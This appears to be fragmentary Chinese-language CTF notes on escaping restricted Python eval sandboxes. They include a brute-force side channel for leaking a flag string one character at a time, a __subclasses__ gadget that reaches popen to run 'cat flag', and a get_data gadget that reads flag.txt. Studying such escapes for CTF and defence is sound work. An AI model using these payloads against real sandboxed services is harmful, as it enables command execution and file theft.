'swapcase', 'title', 'translate', 'upper', 'zfill'] |
True == 1 False == 0 可用此来判断 'isalnum', 'isalpha', 'isascii', 'isdecimal', 'isdigit', 'isidentifier', 'islower', 'isnumeric', 'isprintable', 'isspace', 'istitle', 'isupper'
| flag.join(flag).split(flag).pop().split().pop(flag.join(flag).split(flag).pop({num}).isdigit()) |
type([])(‘test’) == list(‘test’) –> [‘t’, ‘e’, ‘s’, ‘t’]
bytes 的切片数据类型为 int
a = b’test’
type(a) –> “bytes”
type(a[0]) –> “int”
a[0] ^ 1 –> 117
来自学长部分 payload
通过 flag.join(flag).split(flag) 可以得到单个字符构成的 list
通过 list.pop() 弹出元素,然后切割 flag,确定弹出元素所在的位置
可以通过分割后 list 元素的数量判断重复次数,通过单个元素的长度判断 单个字符的位置
到最后就只能硬猜了,运气好,就猜了 4 次
| type(type(flag).mro())(type(type(flag).mro())(flag).pop({i}).encode()).remove({guess}) |
i => flag 单字符位置
guess => num 猜测字符的 ascii 码
当相等时 return NoneType,当不相等时 报错,然后开始爆破
| type(flag.split())(type(flag.split())(flag).pop({}).encode()).remove({}) |
| print(eval(input("code> "), {"__builtins__": {}}, {"__builtins__": {}})) |
| ().__class__.__base__.__subclasses__()[144].__init__.__globals__['popen']('cat flag').read() |
| inp = input("code> ")[:72] |
| if "__" in inp: |
| print("Nope") |
| else: |
| print(eval(inp, {"__builtins__": {}}, {"__builtins__": {}})) |
| ().__class__.__base__.__subclasses__()[119].get_data('', path=r'flag.txt') |
| eval((__import__("re").sub(r'[a-z0-9]','',input("code > ").lower()))[:130]) |